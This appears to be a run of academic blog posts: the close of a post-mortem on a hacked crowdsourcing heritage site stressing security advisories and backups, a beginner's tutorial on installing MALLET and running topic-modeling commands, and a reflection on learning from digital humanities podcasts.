Problem #3: Security Warnings

There are many Ushahidi installations all over the world, and they deal with some pretty sensitive stuff. Security is therefore something Ushahidi takes seriously. I should’ve too. I was not subscribed to the Ushahidi Security Advisories. The hardest pill to swallow is when you know it’s your own damned fault. The warning was there; heed the warnings! Schedule time into every week to keep on top of security. If you’ve got a team, task someone to look after this. I have lots of excuses – it was end of term, things were due, meetings to be held, grades to get in – but it was my responsibility. And I dropped the ball.

Problem #4: Backups

This is the most embarrasing to admit. I did not back things up regularly. I am not ever making that mistake again. Over on Looted Heritage, I have an IFTTT recipe set up that sends every new report to BufferApp, which then tweets it. I’ve also got one that sends every report to Evernote. There are probably more elegant ways to do this. But the worst would be to remind myself to manually download things. That didn’t work the first time. It ain’t gonna work the next.

So what do I do now?

If I can get my database back, I’ll clean everything out and reinstall, and then progress onwards wiser for the experience. If I can’t… well, perhaps that’s the end of HeritageCrowd. It was always an experiment, and as Scott Weingart reminds us,

The best we can do is not as much as we can, but as much as we need. There is a point of diminishing return for data collection; that point at which you can’t measure the coastline fast enough before the tides change it. We as humanists have to become comfortable with incompleteness and imperfection, and trust that in aggregate those data can still tell us something, even if they can’t reveal everything.

The HeritageCrowd project taught me quite a lot about crowdsourcing cultural heritage, about building communities, about the problems, potentials, and perils of data management. Even in its (quite probable) death, I’ve learned some hard lessons. I share them here so that you don’t have to make the same mistakes. Make new ones! Share them! The next time I go to THATCamp, I know what I’ll be proposing. I want a session on the Black Hats, and the dark side of the force. I want to know what the resources are for learning how they work, what I can do to protect myself, and frankly, more about the social and cultural anthropology of their world. Perhaps there is space in the Digital Humanities for that.


When I discovered what had happened, I tweeted about it. Thank you everyone who responded with help and advice. That’s the final lesson I think, about this episode. Don’t be afraid to share your failures, and ask for help. As Bethany wrote some time ago, we’re at that point where we’re building the new ways of knowing for the future, just like the Lunaticks in the 18th century. Embrace your inner Lunatick:

Those 18th-century Lunaticks weren’t about the really big theories and breakthroughs – instead, their heroic work was to codify knowledge, found professional societies and journals, and build all the enabling infrastructure that benefited a succeeding generation of scholars and scientists.


if you agree with me that there’s something remarkable about a generation of trained scholars ready to subsume themselves in collaborative endeavors, to do the grunt work, and to step back from the podium into roles only they can play – that is, to become systems-builders for the humanities — then we might also just pause to appreciate and celebrate, and to use “#alt-ac” as a safe place for people to say, “I’m a Lunatick, too.”

Perhaps my role is to fail gloriously & often, so you don’t have to. I’m ok with that.

Getting Started with MALLET and Topic Modeling

UPDATE! September 19th 2012: Scott Weingart, Ian Milligan, and I have written an expanded ‘how to get started with Topic Modeling and MALLET’ for the Programming Historian 2. Please do consult that piece for detailed step-by-step instructions for getting the software installed, getting your data into it, and thinking through what the results might mean.

Original Post that Inspired It All:

I’m very interested in topic modeling at the moment. It has not been easy however to get started – I owe a debt of thanks to Rob Nelson for helping me to get going. In the interests of giving other folks a boost, of paying it forward, I’ll share my recipe. I’m also doing this for the benefit of some of my students. Let’s get cracking!

First, some background reading:

  1. Clay Templeton, “Topic Modeling in the Humanities: An Overview | Maryland Institute for Technology in the Humanities”, n.d., http://mith.umd.edu/topic-modeling-in-the-humanities-an-overview/.
  2. Rob Nelson, Mining the Dispatch http://dsl.richmond.edu/dispatch/
  3. Cameron Blevins, “Topic Modeling Martha Ballard’s Diary” Historying, April 1, 2010, http://historying.org/2010/04/01/topic-modeling-martha-ballards-diary/
  4. David J Newman and Sharon Block, “Probabilistic topic decomposition of an eighteenth‐century American newspaper,” Journal of the American Society for Information Science and Technology 57, no. 6 (April 1, 2006): 753-767.
  5. David Blei, Andrew Ng, and Michael Jordan, “Latent dirichlet allocation,” The Journal of Machine Learning Research 3 (2003), http://dl.acm.org/citation.cfm?id=944937.

Now you’ll need the software. Go to the MALLET project page, and download Mallet. (Mallet was developed by Andrew McCallum at U Massachusetts, Amherst).

Then, you’ll need the Java developer’s kit – nb, not the regular Java that’s on every computer, but the one that lets you program things. Install this.

Unzip Mallet into your C:/ directory . This is important; it can’t be anywhere else. You’ll then have a folder called C:/mallet-2.0.6 or similar.

Next, you’ll need to create an environment variable called MALLET_HOME. You do this by clicking on control panel >> system >> advanced system settings (in Windows 7; for XP, see this article), ‘environment variables’. In the pop-up, click ‘new’ and type MALLET_HOME in the variable name box; type c:/mallet-2.0.6 (ie, the exact location where you unzipped Mallet) in variable value.

To run mallet, click on your start menu >> all programs >> accessories >> command prompt. You’ll get the command prompt window, which will have a cursor at c:\user\user> (or similar). type cd .. (two periods; that ain’t a typo) to go up a level; keep doing this until you’re at the C:\ .  Then type cd:\mallet-2.0.6 and you’re in the Mallet directory. You can now type Mallet commands directly. If you type bin\mallet at this point, you should be presented with a list of Mallet commands – congratulations!

At this point, you’ll want some data. Using the regular windows explorer, I create a folder within mallet where I put all of the data I want to study (let’s call it ‘data’). If I were to study someone’s diary, I’d create a unique text file for each entry, naming the text file with the entry’s date. Then, following the topic modeling instructions on the mallet page, I’d import that folder, and see what happens next. I’ve got some work flow for scraping data from websites and other repositories, but I’ll leave that for another day (or skip ahead to The Programming Historian for one way of going about it.)

Once you’ve imported your documents, Mallet creates a single ‘mallet’ file that you then manipulate to determine topics.

bin\mallet import-dir --input \data\johndoediary --output
johndoediary.mallet \ --keep-sequence --remove-stopwords

(modified from the Mallet topic modeling page)

This sequence of commands tells mallet to import a directory located in the subfolder ‘data’ called ‘johndoediary’ (which contains a sequence of txt files). It then outputs that data into a file we’re calling ‘johndoediary.mallet. Removing stopwords strips out ‘and’ ‘of’ ‘the’ etc.

Then we’re ready to find some topics:

bin\mallet train-topics --input johndoediary.mallet \
  --num-topics 100 --output-state topic-state.gz --output-topic-keys
  johndoediary_keys.txt --output-doc-topics johndoediary_composition.txt

(modified from the Mallet topic modeling page)

Now, there are more complicated things you can do with this – take a look at the documentation on the Mallet page. Is there a ‘natural’ number of topics? I do not know. What I have found is that I have to run the train-topics with varying numbers of topics to see how the composition file breaks down. If I end up with the majority of my original texts all in a very limited number of topics, then I need to increase the number of topics; my settings were too coarse.

More on interpreting the output of Mallet to follow.

Again, I owe an enormous debt of gratitude to Rob Nelson for talking me through the intricacies of getting Mallet to work, and for the record, I think the work he is doing is tremendously important and fascinating!

I know that I know nothing

Commuting in Ottawa is an interesting experience. It seems the entire city disappears in the summer, beguiling one into thinking that a commute that takes 30 – 40 minutes in August will continue to be 30 – 40 minutes in September.

This morning, I was pushing 1 hr and 40 minutes. On the plus side, this gives me the opportunity to listen to the podcasts from Scholars’ Lab, from the University of Virginia (available via iTunes U).  As I listen to this excellent series of talks (one talk per commute…) I realize just how profoundly shallow my knowledge is of the latest happenings in Digital Humanities – and that’s a good thing! For instance, I learned about Intrasis, a system from Sweden for recording archaeological sites (or indeed, any kind of knowledge) that focuses on generating relationships from the data, rather than specifying beforehand a relationships table (and it melds very well with GIS). This is cool. I learned also about Heurist, a tool for managing research.  Also ‘Heml’ – the Historical Event Markup and Linking Project, lead by Bruce Robertson. As I listened to this last talk, as Bruce described the problems of marking up events/places/persons using non-Gregorian calendars and so on, it struck me that this problem was rather similar to the one of defining sites in a GIS – what do you do when the boundaries are fuzzy? How do you avoid the in-built precision of dots-on-a-map, or URLS that lead to one specific location? Time is Space, as Einstein taught us….

The upshot is, I feel very humbled when I listen to these in-depth and fascinating talks – I feel rather out of my depth. At the same time, I am excited to be able to participate in such a fast moving field.  Hopefully, my small contributions to agent modeling for history generate the same kind of excitement for others!